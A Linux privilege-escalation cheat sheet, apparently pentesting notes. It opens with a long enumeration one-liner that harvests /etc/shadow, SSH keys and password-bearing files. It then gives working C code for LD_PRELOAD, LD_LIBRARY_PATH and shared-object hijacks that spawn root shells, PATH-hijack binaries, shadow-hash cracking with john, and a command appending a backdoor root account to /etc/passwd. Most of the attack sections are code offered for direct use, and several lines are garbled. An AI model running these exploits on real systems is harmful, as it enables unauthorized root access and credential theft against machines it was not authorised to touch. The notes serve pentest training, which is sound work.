Linux Manual Exploitation

Linux privesc in brief

• sudo -l

• Kernel Exploits

• OS Exploits

• Password reuse (mysql, .bash_history, 000-default.conf...)

• Known binaries with suid flag and interactive (nmap)

• Custom binaries with suid flag either using other binaries or with command execution

• Writable files owned by root that get executed (cronjobs)

• MySQL as root

• Vulnerable services (chkrootkit, logrotate)

• Writable /etc/passwd

• Readable .bash_history

• SSH private key

• Listening ports on localhost

• /etc/fstab

• /etc/exports

• /var/mail

• Process as other user (root) executing something you have permissions to modify

• SSH public key + Predictable PRNG

• apt update hooking (Pre-Invoke)

• Capabilities

File System

• /root root user's home directory. Usually only accessible by root user.

• /home user's directory. Good to remember user's names.

• /etc system configuration files. passwd and shadow files are here.

• /bin and /sbin System binaries. useful for telling you which commands you can run

• /usr user's binaries and libraries can be found here,

• /var Contains logs and if apache, web files can be found here.

• /dev device drivers

• /lib contain shared libraries

• /boot files for booting the system

• /mnt mount point for media

• /proc contains processes marked as a file by process number

• /tmp Holds temporary files and is usually globally readable/writable

One liner

Here you have an old linpeas version script in one line, just copy and paste it;)

The color filtering is not available in the one-liner (the lists are too big)

This one-liner is deprecated (I'm not going to update it any more), but it could be useful in some cases so it will remain here.

The default file where all the data is stored is: /tmp/linPE (you can change it at the beginning of the script)

file="/tmp/linPE";RED='\033[0;31m';Y='\033[0;33m';B='\033[0;34m';NC='\033[0m';rm -rf $file;echo "File: $file";echo "[+]Gathering system information...";printf $B"[*] "$RED"BASIC SYSTEM INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Operative system\n"$NC >> $file;(cat /proc/version || uname -a ) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"PATH\n"$NC >> $file;echo $PATH 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Date\n"$NC >> $file;date 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo version\n"$NC >> $file;sudo -V 2>/dev/null| grep "Sudo ver" >> $file;echo "" >> $file;printf $Y"[+] "$RED"selinux enabled?\n"$NC >> $file;sestatus 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Useful software?\n"$NC >> $file;which nc ncat netcat wget curl ping gcc make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Capabilities\n"$NC >> $file;getcap -r / 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Environment\n"$NC >> $file;(set || env) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Top and cleaned proccesses\n"$NC >> $file;ps aux 2>/dev/null | grep -v "\[" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Binary processes permissions\n"$NC >> $file;ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Services\n"$NC >> $file;(/usr/sbin/service --status-all || /sbin/chkconfig --list || /bin/rc-status) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Different processes executed during 1 min (HTB)\n"$NC >> $file;if [ "`ps -e --format cmd`" ]; then for i in {1..121}; do ps -e --format cmd >> $file.tmp1; sleep 0.5; done; sort $file.tmp1 | uniq | grep -v "\[" | sed '/^.\{500\}./d' >> $file; rm $file.tmp1; fi;echo "" >> $file;printf $Y"[+] "$RED"Proccesses binary permissions\n"$NC >> $file;ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Scheduled tasks\n"$NC >> $file;crontab -l 2>/dev/null >> $file;ls -al /etc/cron* 2>/dev/null >> $file;cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root /var/spool/anacron 2>/dev/null | grep -v "^#" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Any sd* disk in /dev?\n"$NC >> $file;ls /dev 2>/dev/null | grep -i "sd" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Storage information\n"$NC >> $file;df -h 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Unmounted file-system?\n"$NC >> $file;cat /etc/fstab 2>/dev/null | grep -v "^#" >> $file;echo "" >> $file;printf $Y"[+] "$RED"Printer?\n"$NC >> $file;lpstat -a 2>/dev/null >> $file;echo "" >> $file;echo "" >> $file;echo "[+]Gathering network information...";printf $B"[*] "$RED"NETWORK INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Hostname, hosts and DNS\n"$NC >> $file;cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" >> $file;dnsdomainname 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Networks and neightbours\n"$NC >> $file;cat /etc/networks 2>/dev/null >> $file;(ifconfig || ip a) 2>/dev/null >> $file;iptables -L 2>/dev/null >> $file;ip n 2>/dev/null >> $file;route -n 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Ports\n"$NC >> $file;(netstat -punta || ss -t; ss -u) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Can I sniff with tcpdump?\n"$NC >> $file;timeout 1 tcpdump >> $file 2>&1;echo "" >> $file;echo "" >> $file;echo "[+]Gathering users information...";printf $B"[*] "$RED"USERS INFO\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"Me\n"$NC >> $file;(id || (whoami && groups)) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo -l without password\n"$NC >> $file;echo '' | sudo -S -l -k 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Do I have PGP keys?\n"$NC >> $file;gpg --list-keys 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Superusers\n"$NC >> $file;awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Login\n"$NC >> $file;w 2>/dev/null >> $file;last 2>/dev/null | tail >> $file;echo "" >> $file;printf $Y"[+] "$RED"Users with console\n"$NC >> $file;cat /etc/passwd 2>/dev/null | grep "sh$" >> $file;echo "" >> $file;printf $Y"[+] "$RED"All users\n"$NC >> $file;cat /etc/passwd 2>/dev/null | cut -d: -f1 >> $file;echo "" >> $file;echo "" >> $file;echo "[+]Gathering files information...";printf $B"[*] "$RED"INTERESTING FILES\n"$NC >> $file ;echo "" >> $file;printf $Y"[+] "$RED"SUID\n"$NC >> $file;find / -perm -4000 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"SGID\n"$NC >> $file;find / -perm -g=s -type f 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Files inside \$HOME (limit 20)\n"$NC >> $file;ls -la $HOME 2>/dev/null | head -n 20 >> $file;echo "" >> $file;printf $Y"[+] "$RED"20 First files of /home\n"$NC >> $file;find /home -type f 2>/dev/null | column -t | grep -v -i "/"$USER | head -n 20 >> $file;echo "" >> $file;printf $Y"[+] "$RED"Files inside .ssh directory?\n"$NC >> $file;find  /home /root -name .ssh 2>/dev/null -exec ls -laR {} \; >> $file;echo "" >> $file;printf $Y"[+] "$RED"*sa_key* files\n"$NC >> $file;find / -type f -name "*sa_key*" -ls 2>/dev/null -exec ls -l {} \; >> $file;echo "" >> $file;printf $Y"[+] "$RED"Mails?\n"$NC >> $file;ls -alh /var/mail/ /var/spool/mail/ 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"NFS exports?\n"$NC >> $file;cat /etc/exports 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Hashes inside /etc/passwd? Readable /etc/shadow or /etc/master.passwd?\n"$NC >> $file;grep -v '^[^:]*:[x]' /etc/passwd 2>/dev/null >> $file;cat /etc/shadow /etc/master.passwd 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Readable /root?\n"$NC >> $file;ls -ahl /root/ 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Inside docker or lxc?\n"$NC >> $file;dockercontainer=`grep -i docker /proc/self/cgroup  2>/dev/null; find / -name "*dockerenv*" -exec ls -la {} \; 2>/dev/null`;lxccontainer=`grep -qa container=lxc /proc/1/environ 2>/dev/null`;if [ "$dockercontainer" ]; then echo "Looks like we're in a Docker container" >> $file; fi;if [ "$lxccontainer" ]; then echo "Looks like we're in a LXC container" >> $file; fi;echo "" >> $file;printf $Y"[+] "$RED"*_history, profile, bashrc, httpd.conf\n"$NC >> $file;find / -type f \( -name "*_history" -o -name "profile" -o -name "*bashrc" -o -name "httpd.conf" \) -exec ls -l {} \; 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"All hidden files (not in /sys/) (limit 100)\n"$NC >> $file;find / -type f -iname ".*" -ls 2>/dev/null | grep -v "/sys/" | head -n 100 >> $file;echo "" >> $file;printf $Y"[+] "$RED"What inside /tmp, /var/tmp, /var/backups\n"$NC >> $file;ls -a /tmp /var/tmp /var/backups 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Interesting writable Files\n"$NC >> $file;USER=`whoami`;HOME=/home/$USER;find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | grep -v '/sys/fs'| sort | uniq >> $file;for g in `groups`; do find / \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME | grep -v '/sys/fs'; done >> $file;echo "" >> $file;printf $Y"[+] "$RED"Web files?(output limited)\n"$NC >> $file;ls -alhR /var/www/ 2>/dev/null | head >> $file;ls -alhR /srv/www/htdocs/ 2>/dev/null | head >> $file;ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head >> $file;ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head >> $file;echo "" >> $file;printf $Y"[+] "$RED"Backup files?\n"$NC >> $file;find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*back*" -o -name "*bck*" \) 2>/dev/null >> $file;echo "" >> $file;printf $Y"[+] "$RED"Find IPs inside logs\n"$NC >> $file;grep -a -R -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' /var/log/ 2>/dev/null | sort | uniq >> $file;echo "" >> $file;printf $Y"[+] "$RED"Find 'password' or 'passw' string inside /home, /var/www, /var/log, /etc\n"$NC >> $file;grep -lRi "password\|passw" /home /var/www /var/log 2>/dev/null | sort | uniq >> $file;echo "" >> $file;printf $Y"[+] "$RED"Sudo -l (you need to puts the password and the result appear in console)\n"$NC >> $file;sudo -l;

Collecting Information

OS, Kernel & Hostname -

Important for kernel exploit

This will print information about operating system and kernel related information , useful in kernel exploitation

cat /etc/lsb-release

cat /etc/issue

cat /proc/version

hostname

uname -a

Users -

/etc/passwd

The passwd file stores essential user account information required during login. The passwd file is stored in the /etc directory and contains information such as the user ID, group ID, home directory and the path to the command shell. An ‘x’ character means that the encrypted password is stored in the /etc/shadow file.

The following commands can be used to retrieve information about the current user and active session:

cat /etc/passwd

id

who

w

Network Information

Network Adapters -

Will print adapter target connected with , this will give us insight of how many networks are connected with box and also information about internal network if available

ifconfig

ip a

Print Routing tables

Information related different network routes , give us information about target network reach , useful in pivoting through different networks

route

Print the active connections

This will list all connections going on withing target system , this way we can determine what services are running and will be useful for us to extract important information

netstat -antup

Print the arp entries

arp -e

/proc/net/

more discreet, all the information given by the above commands can be found by looking into the files under /proc/net, and this approach is less likely to trigger monitoring or other stuff

cat /proc/net/*

Application and Services

Retrieve information about services

knowing which services are running with root privileges can be very important for priv esc because exploiting them will result in root-level access

Service exploits can be found using Searchsploit, Google, and GitHub, just like with Kernel exploits.

ps aux

ps aux | grep root

ps aux | grep "^root"

<program> --version

<program> -v

dpkg -l | grep <program>
# On Debian-like distributions, dpkg can show installed programs and their version

rpm –qa | grep <program>
# On systems that use rpm, the following achieves the same

To retrieve installed applications

important to check if any application that is installed vulnerable to any known exploits

dpkg -l
# Debian OS

rpm -qa
# Fedora based OS

pacman -Qe
# Arch based OS

pkginfo
# SOlaris

cd /var/db/pkg/ && ls -d */*
# Gentoo

Sudoers

Make sure you pay attention to the groups to which the privileged user belongs. One especially important group is the sudo (‘Super User Do’) group. A user that is a member of the sudo group is able to execute commands in the context of the root user without providing the root password – depending on the settings in the sudoer file you may only need to enter the password for the current user or none at all.

Useful commands

# Run a program using sudo:
sudo <program>

# Run a program as a specific user:
sudo -u <username><program>

# List programs a user is allowed to run:
sudo -l

# Login as another user:
sudo -i -u scriptmanager

If you are part of group and can run specified , check https://gtfobins.github.io/ with that binary on how to liverage your access to gain root with that binary

LD_PRELOAD

LD_PRELOAD is an environment variable which can be set to the path of a shared object (.so) file.

When set, the shared object will be loaded before any others.

By creating a custom shared object and creating an init() function, we can execute code as soon as the object is loaded.

Exploitation -

1. Run sudo -l to check if env_keepoption is set

2. Create a file (preload.c) with the following contents:

#include <stdio.h> 
#include <sys/types.h> 
#include <stdlib.h> 
void _init() { 
    unsetenv("LD_PRELOAD"); 
    setresuid(0,0,0); 
    system("/bin/bash -p"); 
}

3. Compile preload.c to preload.so:

gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c

4. Run any allowed program using sudo, while setting the LD_PRELOAD environment variable to the full path of the preload.so file:

sudo LD_PRELOAD=/tmp/preload.so apache2

LD_LIBRARY_PATH

The LD_LIBRARY_PATH environment variable contains a set of directories where shared libraries are searched for first.

The ldd command can be used to print the shared libraries used by a program:

ldd /usr/sbin/apache2

By creating a shared library with the same name as one used by a program, and setting LD_LIBRARY_PATH to its parent directory, the program will load our shared library instead.

Exploitation -

1. Run lld against the apache2 program file -

$ ldd /usr/sbin/apache2 
linux-vdso.so.1 => (0x00007fff063ff000) ... 
libcrypt.so.1 => /lib/libcrypt.so.1 (0x00007f7d4199d000) 
libdl.so.2 => /lib/libdl.so.2 (0x00007f7d41798000) 
libexpat.so.1 => /usr/lib/libexpat.so.1 (0x00007f7d41570000) 
/lib64/ld-linux-x86-64.so.2 (0x00007f7d42e84000)

Hijacking shared objects using this method is hit or miss. Choose one from the list and try it (libcrypt.so.1 seems to work well).

2. Create a file (library_path.c) with the following contents:

#include <stdio.h> 
#include <stdlib.h> 

static void hijack() __attribute__((constructor)); 

void hijack() { 
    unsetenv("LD_LIBRARY_PATH"); 
    setresuid(0,0,0); 
    system("/bin/bash -p"); 
}

3. Compile library_path.c into libcrypt.so.1:

gcc -o libcrypt.so.1 -shared -fPIC library_path.c

4. Run apache2 using sudo, while setting the LD_LIBRARY_PATH environment variable to the current path (where we compiled library_path.c):

sudo LD_LIBRARY_PATH=. apache2

Cron Jobs

• Cron jobs are programs or scripts which users can schedule to run at specific times or intervals.

• Cron jobs run with the security level of the user who owns them.

cat /etc/crontab

crontab -e

Weak File Permission

Misconfiguration of file permissions associated with cron jobs can lead to easy privilege escalation. If we can write to a program or script which gets run as part of a cron job, we can replace it with our own code (Most of time reverse shell)

ls -la <Path_of_file_using_in_cronjob>

PATH Environment Variable

The crontab PATH environment variable is by default set to /usr/bin:/bin

The PATH variable can be overwritten in the crontab file.

If a cron job program/script does not use an absolute path, and one of the PATH directories is writable by our user, we may be able to create a program/script with the same name as the cron job.

Steps to check -

1. First print $PATH variable to see if we can manipulate it according to our need

$ echo $PATH

/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

2. Adding our own path to $PATH where we can write our own malicious binary , in this example /tmp directory

export PATH=/tmp:$PATH

it will add /tmp in front of PATH variable so now when cron job run , it will start looking for that particular binary through $PATH variable and since we put our own path in starting , it will first look for that file in that directory so we ned to put our own malicious binary with same name in our directory

3. Put your malicious binary in directory which you added to $PATH

cd /tmp

echo "/bin/bash" > <binary>

chmod +x <binary>

/etc/shadow

1. If you are able to read this file ,

head -n 1 /etc/shadow

1. Extract the root user's password

2. Save the password hash in a file

echo '$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVl XvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0' > hash.txt'

3. Crack the password hash using john

john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.t xt hash.txt

2. If you have writable permission ,

1. Generate a new SHA-512 password hash -

mkpasswd -m sha-512 newpassword

2. Edit the /etc/shadow and replace the root user’s password hash with the one we generated.

/etc/passwd

If you have writable permission -

openssl passwd "password"

1. Generate a password using opnssl

2. Edit the /etc/passwd file and enter the hash in the second field of the root user row in the place of 'x'

3. Or you can do it append a new row to it to create an alternate root user

echo "newroot:L9yLGxncbOROc:0:0:root:/root:/bin/bash" >> /etc/passwd

SUID - SGID

Finding SUID and SGID

find / -perm -4000 2>/dev/null
# Print all suid

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
# Print both SUID and SGID

If you get any unusual binary set with SUID or SGID bit , always check on https://gtfobins.github.io/ to get exploitation steps to achieve root

Shared Object Injection

When a program is executed, it will try to load the shared objects it requires.

By using a program called strace, we can track these system calls and determine whether any shared objects were not found.

If we can write to the location the program tries to open, we can create a shared object and spawn a root shell when it is loaded.

Exploitation -

1. Find SUID/SGID files on the target:

$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null 
... 
-rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-so 
...

The suid-so file should execute with root user permissions.

2. Run strace on the SUID file:

$ strace /usr/local/bin/suid-so 2>&1 | grep -iE "open|access|no such file" 
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory) 
... 
open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)

The libcalc.so shared object could not be found, and the program is looking in our user’s home directory, which we can write to.

3. Create the /home/user/.config directory

4. Create the file libcalc.c with the following contents:

#include <stdio.h> 
#include <stdlib.h> 
static void inject() __attribute__((constructor)); 
void inject() { 
    setuid(0); 
    system("/bin/bash -p"); 
}

5. Compile libcalc.c into /home/user/.config/libcalc.so:

gcc -shared -fPIC -o /home/user/.config/libcalc.so libcalc.c

6. Run the SUID executable to get a root shell:

/usr/local/bin/suid-so

Path Manipulation

It is very simple to view the Path of the relevant user with help of echo command.

$ echo $PATH

/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

Exploitation -

If you find that you can write inside some folder of the $PATH you may be able to escalate privileges by creating a backdoor inside the writable folder with the name of some command that is going to be executed by a different user (root ideally) and that is not loaded from a folder that is located previous to your writable folder in $PATH.

Example -

we came with one suid that executing some other binaries

find / -perm -u=s -type f 2>/dev/null

so it's executing /bin/ps binary to get process status , so what we can do is , make our own ps binary containing malicious payload and execute it with adding PATH to it

Creating malicious binary -

cd /tmp

echo "/bin/bash" > ps

chmod +x ps

Exporting current path in front -

echo $PATH

export PATH=/tmp:$PATH

it will add /tmp in front of PATH variable so now if someone execute that binary it will try to run ps and thus our own ps binary executed giving us root access

Passwords and configs

Finding different information

Scan for password or credential word in files

grep -rnw / -e 'password\|pass\|creds\|credentials' 2>/dev/null -i

find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;

grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null

Find all directories which can be written to

find / -executable -writable -type d 2> /dev/null

Find all writable files and readable files

find /etc -maxdepth 1 -writable -type f
# Search for writable files in /etc

find /etc -maxdepth 1 -readable -type f
# Search for readable files in /etc

Configs

ls -aRl /etc/ * awk '$1 ~ /w.$/' * grep -v lrwx 2>/dev/nullte    
cat /etc/issue{,.net}
cat /etc/master.passwd
cat /etc/group
cat /etc/hosts
cat /etc/crontab
cat /etc/sysctl.conf
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons)
cat /etc/resolv.conf
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.confcda
cat /etc/inetd.conf    
cat /opt/lampp/etc/httpd.conf
cat /etc/samba/smb.conf
cat /etc/openldap/ldap.conf
cat /etc/ldap/ldap.conf
cat /etc/exports
cat /etc/auto.master
cat /etc/auto_master
cat /etc/fstab
find /etc/sysconfig/ -type f -exec cat {} \;